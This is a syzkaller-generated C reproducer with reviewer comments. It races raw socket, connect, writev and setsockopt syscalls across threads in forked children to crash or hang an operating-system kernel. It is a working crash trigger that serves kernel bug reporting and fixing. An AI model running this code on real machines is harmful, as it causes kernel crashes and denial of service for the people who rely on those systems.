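// https://syzkaller.appspot.com/bug?id=80d1cf270e18a558257d0da390811641f78b5c01
// autogenerated by syzkaller (https://github.com/google/syzkaller)
//
// Kernel crash reproducer. It forks a child every iteration and has the
// child issue a fixed sequence of six raw syscalls, first serially and then
// racing them across worker threads. Run it ONLY inside a disposable VM
// that you are prepared to lose: a successful run is a kernel crash or hang.
//
// NOTE(review): the extraction that produced this listing stripped the
// header names from every #include. The list below is rebuilt from the
// symbols the code actually uses (pthread_*, kill/SIGKILL, waitpid, usleep,
// clock_gettime, syscall/SYS_*, memcpy, uint64_t) — compare against the
// original on the dashboard before relying on it.
#define _GNU_SOURCE

#include <pthread.h>
#include <signal.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

/*
 * SIGKILL `pid` and reap until that pid is returned. waitpid(-1) also reaps
 * any other child that exits in the meantime; loop() only ever has one.
 */
static void kill_and_wait(int pid, int* status)
{
    kill(pid, SIGKILL);
    while (waitpid(-1, status, 0) != pid) {
    }
}

/* Sleep for `ms` milliseconds. */
static void sleep_ms(uint64_t ms)
{
    usleep(ms * 1000);
}

/* Monotonic clock in milliseconds; exits the process if the clock fails. */
static uint64_t current_time_ms(void)
{
    struct timespec ts;
    if (clock_gettime(CLOCK_MONOTONIC, &ts))
        exit(1);
    return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

/*
 * Start `fn(arg)` on a new thread with a 128 KiB stack. The handle is
 * discarded: workers are never joined, they are reused through events.
 */
static void thread_start(void* (*fn)(void*), void* arg)
{
    pthread_t th;
    pthread_attr_t attr;
    pthread_attr_init(&attr);
    pthread_attr_setstacksize(&attr, 128 << 10);
    if (pthread_create(&th, &attr, fn, arg))
        exit(1);
    pthread_attr_destroy(&attr);
}

/* One-shot, manually reset event: mutex + condvar around a 0/1 flag. */
typedef struct {
    pthread_mutex_t mu;
    pthread_cond_t cv;
    int state;
} event_t;

static void event_init(event_t* ev)
{
    if (pthread_mutex_init(&ev->mu, 0))
        exit(1);
    if (pthread_cond_init(&ev->cv, 0))
        exit(1);
    ev->state = 0;
}

/* Clears the flag without taking the lock; callers only do this from the
 * thread that is about to wait on the event again. */
static void event_reset(event_t* ev)
{
    ev->state = 0;
}

/* Raise the flag and wake all waiters. Setting an already-set event is a
 * protocol violation and aborts the process. */
static void event_set(event_t* ev)
{
    pthread_mutex_lock(&ev->mu);
    if (ev->state)
        exit(1);
    ev->state = 1;
    pthread_mutex_unlock(&ev->mu);
    pthread_cond_broadcast(&ev->cv);
}

/* Block until the flag is raised. */
static void event_wait(event_t* ev)
{
    pthread_mutex_lock(&ev->mu);
    while (!ev->state)
        pthread_cond_wait(&ev->cv, &ev->mu);
    pthread_mutex_unlock(&ev->mu);
}

/* Non-blocking read of the flag. */
static int event_isset(event_t* ev)
{
    pthread_mutex_lock(&ev->mu);
    int res = ev->state;
    pthread_mutex_unlock(&ev->mu);
    return res;
}

/*
 * Wait up to `timeout` ms for the flag; returns its final value.
 *
 * NOTE(review): pthread_cond_timedwait expects an absolute CLOCK_REALTIME
 * deadline but is handed a relative duration here, so every call returns
 * immediately and the loop effectively spins until `timeout` has elapsed
 * by the monotonic clock. Left verbatim on purpose: the resulting timing is
 * part of what this reproducer reproduces.
 */
static int event_timedwait(event_t* ev, uint64_t timeout)
{
    uint64_t start = current_time_ms();
    uint64_t now = start;
    pthread_mutex_lock(&ev->mu);
    for (;;) {
        if (ev->state)
            break;
        uint64_t remain = timeout - (now - start);
        struct timespec ts;
        ts.tv_sec = remain / 1000;
        ts.tv_nsec = (remain % 1000) * 1000 * 1000;
        pthread_cond_timedwait(&ev->cv, &ev->mu, &ts);
        now = current_time_ms();
        if (now - start > timeout)
            break;
    }
    int res = ev->state;
    pthread_mutex_unlock(&ev->mu);
    return res;
}

#define __syscall syscall

/* Worker slot: `ready` hands a call index to the thread, `done` signals
 * completion back to execute_one(). */
struct thread_t {
    int created, call;
    event_t ready, done;
};

static struct thread_t threads[16];
static void execute_call(int call);
/* Number of calls currently in flight; touched only via __atomic builtins. */
static int running;

/* Worker loop: wait for a call index, run it, report done, repeat forever. */
static void* thr(void* arg)
{
    struct thread_t* th = (struct thread_t*)arg;
    for (;;) {
        event_wait(&th->ready);
        event_reset(&th->ready);
        execute_call(th->call);
        __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
        event_set(&th->done);
    }
    return 0;
}

/*
 * Run the six-call program twice. Pass one dispatches each call to the
 * first idle worker and waits up to 45 ms for it. Pass two (`collide`) does
 * the same but does not wait after even-numbered calls, so consecutive
 * calls overlap on different threads — the race the reproducer relies on.
 * Each pass ends by giving in-flight calls up to ~100 ms to drain.
 */
static void execute_one(void)
{
    int i, call, thread;
    int collide = 0;
again:
    for (call = 0; call < 6; call++) {
        for (thread = 0; thread < (int)(sizeof(threads) / sizeof(threads[0])); thread++) {
            struct thread_t* th = &threads[thread];
            if (!th->created) {
                th->created = 1;
                event_init(&th->ready);
                event_init(&th->done);
                event_set(&th->done);
                thread_start(thr, th);
            }
            if (!event_isset(&th->done))
                continue;
            event_reset(&th->done);
            th->call = call;
            __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
            event_set(&th->ready);
            if (collide && (call % 2) == 0)
                break;
            event_timedwait(&th->done, 45);
            break;
        }
    }
    for (i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++)
        sleep_ms(1);
    if (!collide) {
        collide = 1;
        goto again;
    }
}

static void execute_one(void);

#define WAIT_FLAGS 0

/*
 * Outer driver: fork a child per iteration, let it run execute_one(), and
 * give it 5 s before SIGKILL. Never returns; stop it from outside.
 */
static void loop(void)
{
    int iter;
    for (iter = 0;; iter++) {
        int pid = fork();
        if (pid < 0)
            exit(1);
        if (pid == 0) {
            execute_one();
            exit(0);
        }
        int status = 0;
        uint64_t start = current_time_ms();
        for (;;) {
            if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
                break;
            sleep_ms(1);
            if (current_time_ms() - start < 5 * 1000)
                continue;
            kill_and_wait(pid, &status);
            break;
        }
    }
}

/* Descriptors returned by calls 0 and 2; -1 until those calls succeed. */
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};

/*
 * The reproducer program, one case per call. All pointer arguments live in
 * the fixed scratch region at 0x20000000 mapped by main().
 *
 * NOTE(review): the seven-argument mmap in main() and the 0xffff level in
 * call 5 look like BSD conventions rather than Linux ones — confirm the
 * target OS on the dashboard before reading any of these constants.
 *
 * Do not "fix" the apparent mistakes below; they are the test case:
 *   - call 0's domain/type words carry bits above 32 that the kernel may
 *     truncate;
 *   - call 1 closes r[0], yet call 5 still passes r[0] to setsockopt
 *     (a closed or reused descriptor, by design);
 *   - call 3 passes an address whose first half-word is 0x282 and whose
 *     payload is the path "./file0" to a socket opened with domain 2.
 */
static void execute_call(int call)
{
    long res;
    switch (call) {
    case 0:
        res = syscall(SYS_socket, 0x10000000011, 0x8000000003, 0);
        if (res != -1)
            r[0] = res;
        break;
    case 1:
        syscall(SYS_close, r[0]);
        break;
    case 2:
        res = syscall(SYS_socket, 2, 2, 0);
        if (res != -1)
            r[1] = res;
        break;
    case 3:
        *(uint16_t*)0x20000000 = 0x282;
        memcpy((void*)0x20000002, "./file0\x00", 8);
        syscall(SYS_connect, r[1], 0x20000000, 0x10);
        break;
    case 4:
        /* One iovec of 0x7a4 (1956) bytes of generator-chosen data. */
        *(uint64_t*)0x20001640 = 0x200016c0;
        memcpy(
            (void*)0x200016c0,
            "\x74\x00\x80\x85\x6c\xd5\xe3\xd4\x28\x4b\xb2\xef\x37\xfa\xee\xdf\xdb"
            "\x81\x94\x18\xe8\x99\xf0\xdd\x2d\x7d\xac\x38\x60\xb0\x24\x74\x19\xdf"
            "\x60\xf9\x43\x36\x1c\x63\x36\xe0\xdf\xb8\xff\xe2\x51\x81\x21\xcb\x7c"
            "\x03\x4c\xb8\x14\xae\xc2\xad\x3d\xf9\x38\x56\xbc\xb9\x2f\x48\x14\xbb"
            "\x36\x5f\xf3\x9b\xd3\x63\x55\x98\xa9\x28\xd5\xb9\xcf\xf4\x08\x8c\xa3"
            "\x6f\xc7\x44\x2d\xf2\x74\xca\x12\x76\xcb\x2c\x92\x71\x63\xb4\xe0\x66"
            "\xdb\x48\x63\x33\x78\xa4\x0b\x5b\x1b\x4a\x51\xda\xdf\xea\xfe\xc0\xe5"
            "\x40\x5c\x43\x6a\x32\x08\x23\xff\x0c\x88\x3b\xa3\xdd\x05\x90\xfb\x3e"
            "\xcf\x99\xe2\x6b\x9b\xde\x71\xe8\x0e\xdd\x04\xf0\x7e\x3b\x8b\x3b\x27"
            "\x1a\x69\xab\x23\xad\x2a\x16\x67\x6d\xc1\xbf\xc0\xae\x34\x5b\x0c\xcc"
            "\x03\xb2\x15\xa8\xd4\xf5\x58\xf1\xff\x07\xc2\x07\xee\x86\xae\xdc\x44"
            "\x24\xa5\xa1\xe8\x30\xff\xcf\x4f\x22\x9f\x1f\xfe\x75\xa1\x76\xde\x3d"
            "\xc1\x66\x83\x57\xc4\x41\x64\x57\xf7\x01\x03\x98\xfe\xc8\x4d\xa1\xb2"
            "\x6c\xd6\x40\xc9\x59\x05\x11\xe3\x60\xa5\x1a\x8b\xc4\xef\x9a\x55\x78"
            "\xe1\xa8\x13\x46\x8c\xdc\xc5\x6c\x85\xf0\x18\x30\xc5\x06\x49\xa2\x57"
            "\xad\x8d\x20\xac\xbf\xcc\x95\x2d\xd8\x6a\x16\xc8\xdf\x9f\xb5\xd0\x74"
            "\xb6\x2b\xb8\x6e\xb4\xa2\x12\xcb\xda\x50\xd1\x95\x20\x29\x5d\x72\xd3"
            "\x3f\x6b\xb6\xbc\x4e\x7d\xcb\xc9\x05\xe3\x80\xb3\x16\x2f\xc7\x83\xde"
            "\x4f\x52\xf8\x1e\x8e\x40\xb8\x0f\x7c\x2d\x94\xbd\x47\xcc\x61\x6c\xb1"
            "\xb2\x86\xdd\x51\x02\x6b\xac\xd2\xe8\xcc\x7b\xf7\x5b\x2c\x50\xcd\x3e"
            "\xfb\xf6\x94\x2c\xa1\x51\xfa\x47\xb4\x49\x7e\xef\x37\x18\x51\xb0\xce"
            "\x03\xaf\x8c\x8a\x41\x05\xb7\x8f\xa9\x58\xfb\x06\x1c\x19\xcb\x66\x41"
            "\x8b\xbe\x55\x1b\x1c\xbd\x39\x2f\xbe\x56\x0e\x0c\x93\x7a\x97\xb4\xd1"
            "\xc5\x1e\x1e\xb5\xd0\xe4\xf0\xba\x72\xb4\xd0\x16\x5b\xed\x50\x2a\x33"
            "\xe3\x04\x34\x81\x5e\x4b\xa8\xee\xdf\x58\x72\x01\x7c\x4c\xec\xe7\xcf"
            "\x8f\x8b\x81\x88\xbe\x0f\xfe\xe1\x13\x81\xba\x4c\x33\x5f\x0d\xd0\xc6"
            "\x3d\x8f\xb1\xa7\x84\xc7\xb3\x0e\x77\xb3\xbb\x5d\x14\xbb\xc4\x08\xb7"
            "\xb5\xcc\x93\xeb\x0e\x3a\x93\xd2\xd1\xab\x5d\x45\x1f\xe7\xd7\x23\xe7"
            "\x68\xc1\xba\x81\x0f\xd6\x4a\x7a\x06\xf3\xc9\x1f\xa8\x9a\x2b\xf5\x4d"
            "\xd2\xdc\x0c\x93\x0f\x78\x94\x7e\xcc\x15\xe7\x99\xf9\x82\x65\x34\x2a"
            "\x69\x4c\x4a\x27\xf9\xd4\x2a\xd6\x85\x32\xee\xe1\x69\x0d\x69\x26\xbb"
            "\xa4\x46\x9a\xec\xd5\x03\xac\x03\x57\xb1\x61\x7a\x03\x9b\x7c\xe4\xed"
            "\x98\x9c\xe6\x4d\xc8\xc7\xee\x5a\x82\x68\x01\xa9\xda\x81\x44\x95\x5b"
            "\x5c\x44\x34\x37\x95\xbb\x93\x84\x74\x18\xc9\x72\x2d\xb5\xcf\xe8\x42"
            "\x89\x1d\x50\xf1\x8b\x19\x3f\xb6\xde\x1c\x20\x8e\x94\x0d\x7b\xa5\x16"
            "\x83\x70\x3c\x42\x43\x14\x35\x16\x4b\x88\xd0\x17\x6c\x5b\xac\xd6\x39"
            "\x13\xdf\xcb\xbc\x77\x53\x41\x31\x41\xa3\x28\x59\x71\xcc\x31\x39\x49"
            "\xbf\xe1\xdd\x0a\x36\x7a\x65\x67\xb4\x1e\x71\xda\x67\x15\x5c\x01\x83"
            "\xa4\xc1\x9e\x34\xd4\x1b\x9f\x8b\xb1\xe0\x21\x8a\x0f\xdf\x33\xab\x62"
            "\x94\x72\x5c\x17\xed\x26\xa0\xa9\xe9\xba\xc8\x8b\x4d\xbb\xe1\xeb\xfe"
            "\x96\x38\x9c\xde\xaa\x33\x04\x77\xe3\xe8\xe4\x15\x71\x44\x90\x19\xd9"
            "\x43\x5a\x9d\xf7\x53\xea\xa2\x70\x44\xc8\x61\x20\x27\x7b\xc3\x40\x49"
            "\x6a\x48\xeb\xcc\xf2\xd6\xa2\x92\xf8\x76\x73\xa0\x9e\x70\xfe\x2e\x3a"
            "\xbf\xd8\xcb\x9f\x73\x49\xde\x70\xd7\x61\xa6\x9b\x15\xb9\xc9\x42\xbe"
            "\xc6\xda\xa9\xc8\x5f\x14\xc6\xc9\xb6\x92\x2f\xf0\x3a\x12\x45\x4f\xa3"
            "\x78\xe8\x43\x7a\x55\xce\x39\x43\xb2\x27\x21\xb3\x9c\xac\x97\x0e\x08"
            "\x1f\xc1\x3e\x49\x2e\xbc\xdb\x18\x5c\x33\x0f\x32\x05\x0e\xae\x52\x57"
            "\xba\x73\x96\xbc\x8b\xf5\x02\x21\xa5\xcd\x8f\x9e\x3b\x6a\x1f\xd3\xa9"
            "\x2f\xfd\xf3\xde\x4f\xcb\x5f\xec\x23\xcf\x09\xb4\x16\xb1\xc2\x0d\xee"
            "\x60\x6e\x28\x94\xdc\xaf\x47\x58\x73\x0e\x6d\x42\x53\xd6\xc9\x15\x75"
            "\x1e\x4e\x8a\xd5\xe1\xa4\x4a\x05\xbd\x27\xbf\x77\x3c\x22\x2e\x27\x65"
            "\xe3\x19\x9d\x14\xad\x5a\xdc\x14\xb5\x01\x59\x45\xcd\x97\x13\x1b\x8b"
            "\xdc\x26\xab\xa5\x0c\x49\xe9\x61\x5a\x9f\x16\xfc\x99\xdd\x83\xee\x88"
            "\xc7\x8a\xaa\xe2\xed\xb7\x2d\x7c\x97\x7c\xa2\x50\x2a\xba\x0e\x7b\x90"
            "\xc3\x5c\xd0\x1b\x61\x68\xd8\xe7\x57\x12\x4c\xd3\x3d\x96\xbd\x84\xae"
            "\xce\x40\x44\x45\xe4\x69\x1e\xfb\xd6\x3a\x88\x06\x87\x44\x50\x0d\x8d"
            "\x4f\x90\x80\x51\x27\x28\x23\x3c\x90\x34\x98\xb3\x18\x21\xd0\x1a\x5b"
            "\xde\xfb\xe9\x47\x50\x4e\xf0\xbf\x89\x0f\x2f\xa2\xab\xe6\xd0\xde\x5d"
            "\x06\xa4\x78\xaa\x23\x00\xe2\x35\x0d\x90\x2a\x44\x65\xbc\x8f\xb3\xfe"
            "\x1f\xaf\x93\x3e\x53\x44\x60\x3a\x5e\x27\x8c\xd9\x7e\x19\xed\x4b\xa1"
            "\x0a\x6e\xc9\x89\x21\xd1\x15\x43\x15\xa2\x79\xfe\x7f\xc5\x93\xce\x0d"
            "\xb2\x76\xca\x57\xfc\x10\x1b\x6c\xa3\xbf\xf8\xe8\xf1\x2c\x5d\x3f\x92"
            "\xd0\xd3\xd0\xb5\xfd\xea\x19\xf0\xd3\x20\x3b\xc6\xe8\xd2\xa2\x9a\x60"
            "\x91\x4d\x45\x67\x68\xe9\x3b\x22\x09\x7c\xf1\x77\x07\xfd\x24\xa0\xe3"
            "\x7f\x79\x77\xfa\xd2\x18\xeb\x07\x87\x4f\xc5\x57\x86\xf2\xbe\x56\x1d"
            "\x67\xf5\xec\xf4\xaa\xc4\x48\x40\xda\xd9\x42\x98\xab\xa0\x20\xf0\x0e"
            "\x49\x48\x24\x10\x08\xd0\x85\xb3\x12\x27\x4d\x7a\x1c\x82\xbc\x1b\xfd"
            "\x68\x8f\x1d\xf5\xc6\x0e\xd4\xe0\xb0\x32\xe5\x46\xdd\x6a\x7e\x61\xe4"
            "\x52\xca\x81\x2d\x0d\x0e\xf3\xc3\xe2\x9f\x34\x71\x58\xdd\x11\xba\x83"
            "\x43\x5b\x0e\x1e\xfb\xb7\x29\x5b\x32\x66\x65\xe4\xd9\x48\x0a\xff\x06"
            "\xaa\x03\x13\xaf\x38\x81\xf7\x6d\xf5\xd2\xb8\x63\x57\xad\xd2\xff\xc8"
            "\xc2\x03\x56\x90\xcd\xb5\x80\x8a\x57\x83\x10\xc2\x1a\x67\x0f\x0d\x85"
            "\xe0\x90\xc2\xc2\xf4\x50\x82\x95\x09\xc1\x6e\xe1\x72\xf9\xfe\xda\x51"
            "\xd5\x44\x63\x9e\x65\xc2\x29\x58\xd4\xe5\x11\xb2\x47\x6d\x85\x05\xb2"
            "\x79\xa6\x2f\x29\x8b\x44\x8b\xf1\x15\x40\x3b\x8c\xd8\xd8\x19\xa7\xa1"
            "\x25\xbf\x59\x7c\xf9\x1c\xd0\xae\xf6\x3f\x13\x8a\x6f\xb7\xb5\xcc\xf6"
            "\xd5\x0f\xe6\xad\x71\x05\xe7\x87\x87\xa5\xbc\x53\x42\xd9\x63\x8b\x21"
            "\xf8\x55\xe6\x0f\x20\x5e\x30\x43\xe8\x66\x00\x41\x53\x3a\x17\x2a\x31"
            "\x68\x72\x66\xc8\x2b\x70\x8b\xb8\x60\xd2\x4f\x76\x86\xc0\x9e\x41\x0d"
            "\xa9\x70\xbe\x1d\xc9\x0f\x85\x50\xdb\xd3\xbf\xaf\x3e\xe2\xa6\xed\xff"
            "\xf7\x45\x43\x2e\x8c\x01\x09\x26\x19\xcc\x9e\x68\xcf\x6f\x36\x39\xac"
            "\xeb\xa0\x39\x9f\x1c\xcc\x78\xe4\xed\x72\xe7\x4b\xb8\x6d\xde\x6a\x1f"
            "\xcb\x25\x61\x81\x44\x17\x02\x8b\xc2\xc1\x79\xa5\x35\x90\x18\x79\xa7"
            "\xf2\x6b\xb1\xc2\xc3\x55\xad\x10\x4a\xcf\x05\x8e\x75\xdb\x5d\x5c\xb0"
            "\xb0\xb1\xb6\xa4\xfd\x17\xc2\x09\x75\xa5\xac\x23\xd2\xc6\x05\xa6\x97"
            "\x32\x8a\xb3\x82\x2c\x68\xf9\x7d\x31\xfb\x7c\xda\x03\x28\xd2\xe0\xe1"
            "\xab\xf4\x08\xd1\xd6\xf7\xf9\x33\x8f\x23\xfa\x1d\x46\x70\x4b\xe6\xac"
            "\x22\x9f\x18\x0c\x91\x27\xfa\x4e\x22\x6b\x9f\x9c\x9e\x41\x12\xb5\x1a"
            "\xcf\xc9\xf2\x1d\x61\x0b\x4c\x1c\x72\x8c\xb0\xf6\xa9\xfd\xa4\xe0\xc8"
            "\x08\x02\xc1\xfa\x1a\x08\x12\x53\x12\xe3\x60\xa2\x75\xa4\x3e\xa0\x67"
            "\x1b\x51\x8e\x87\x3c\xd7\x18\xc8\x87\xd2\xc5\xe9\x5a\x19\x1c\x5e\x8b"
            "\x0a\x44\xbb\x30\xb7\x81\x23\x57\xf2\x46\x4d\xa0\xd9\x00\x38\x07\xf4"
            "\x1e\xf9\x4c\x76\xe1\x0a\xb9\xff\xa8\x58\xc0\x17\x31\x3d\xc3\xab\xdb"
            "\x70\xe9\x14\x70\x1e\x4f\x01\xdc\x29\xb9\x45\x5d\x47\xf8\xb3\xc1\x4d"
            "\x32\x4a\xa8\x73\x59\x56\xb5\xf0\x74\xf0\x86\x4e\x96\x35\x53\xdc\x95"
            "\x52\x0a\xaa\x1c\x44\x55\xe8\x03\x69\xc9\x1e\x60\xba\xac\xac\x30\x0e"
            "\xd1\x0d\x89\x58\xd1\x06\xff\x88\xec\xad\x9b\xac\x1b\x46\x39\x8e\x35"
            "\xbc\x06\x0c\xdc\x5f\x14\xb4\x69\x10\x4a\xb2\x79\x1b\x8b\x3d\x94\x67"
            "\x09\xe4\x15\x34\xa2\x80\xde\xea\x5e\x64\x5b\xd9\x37\x83\xd6\x80\xe1"
            "\x90\x2e\x8d\xba\x3f\xb4\xcd\xb5\x0d\x6f\x70\xe8\x0e\xef\x52\x58\x2e"
            "\xc8\x9c\xb9\x3d\xf3\xc2\x6e\x49\xfc\x33\xfb\xc9\x8a\xc7\xb3\xfa\x50"
            "\x5b\x7b\xcb\x8e\x5b\x6f\x01\xa5\x1d\x51\xeb\x8b\x24\x4c\x4c\xe2\xe8"
            "\xb1\x30\xa8\x1b\xf8\x24\x72\x15\xb6\x4b\x3e\xf7\x86\xd5\x8d\x40\xac"
            "\xbb\xf7\x7f\xc8\x3f\x77\x6e\xd8\xb8\xa0\xcc\x83\xee\x68\xc2\x40\xc3"
            "\x28\xc2\x8d\xd5\xbc\x96\x7c\xa5\xf9\x83\x47\x33\x39\x04\x0c\xc2\xdb"
            "\x7f\x31\x5e\xf3\x61\x7f\xec\xec\x9b\x1c\xe2\x67\x4c\x79\xb7\xed\xd9"
            "\xe9\x13\xbf\x83\x59\xf4\x3a\x6f\x75\x59\xd2\x8d\xac\x5e\x70\xac\x2c"
            "\x41\x8a\xce\x13\xb3\xc7\x44\x3d\xbe\x02\x54\xd2\x81\x6a\xc3\xfb\xfb"
            "\x45\xa1\x8e\x56\x38\x50\xec\x2b\xf9\xa6\x33\x11\xec\x75\xa0\x61\x11"
            "\x9d\x99\x41\xe9\x55\x30\x01\x48\x49\xae\xbe\xf8\xd6\xee\x28\xdc\x4c"
            "\x91\xbd\x3c\xbd\xb3\x94\xe3\x8e\xc9\x8e\x97\x27\x74\x56\x8f\xd0\xd6"
            "\xb1\x22\xb8\xa0\x5c\x58\xdf\x58\xbb\x1f\x96\x15\x35\xca\x92\x59\xa2"
            "\x14\xb8\x94\x10\xfe\x8d\x59\x41\x62\x4f\x38\xbc\xa4\x70\x2d\x48\xae"
            "\x93\xec\x49\xf4\x42\x5f\x56\x08\xa4\x28\x74\xe3\xe2\x8e\xf1\x06\xc0"
            "\xd7\x94\x9d\x76\x07\xf1\xf6\x64\xab\xfc\xa6\x69\x83\xa7\x41\xf3\x4a"
            "\xf0",
            1956);
        *(uint64_t*)0x20001648 = 0x7a4;
        syscall(SYS_writev, r[1], 0x20001640, 1);
        break;
    case 5:
        *(uint32_t*)0x200000c0 = 2;
        syscall(SYS_setsockopt, r[0], 0xffff, 0x2000, 0x200000c0, 4);
        break;
    }
}

/*
 * Map the 16 MiB scratch region at 0x20000000 that execute_call() writes
 * its syscall arguments into, then run the fork loop forever.
 *
 * The mapping result was previously ignored; if the fixed mapping fails
 * (e.g. the flag word 0x1012 is not an anonymous mapping on this OS), the
 * first store in execute_call() would be a wild write into unmapped memory
 * in every forked child. Fail fast instead, consistent with the other
 * exit(1) paths in this file.
 */
int main(void)
{
    if (syscall(SYS_mmap, 0x20000000, 0x1000000, 3, 0x1012, -1, 0, 0) != 0x20000000)
        exit(1);
    loop();
    return 0;
}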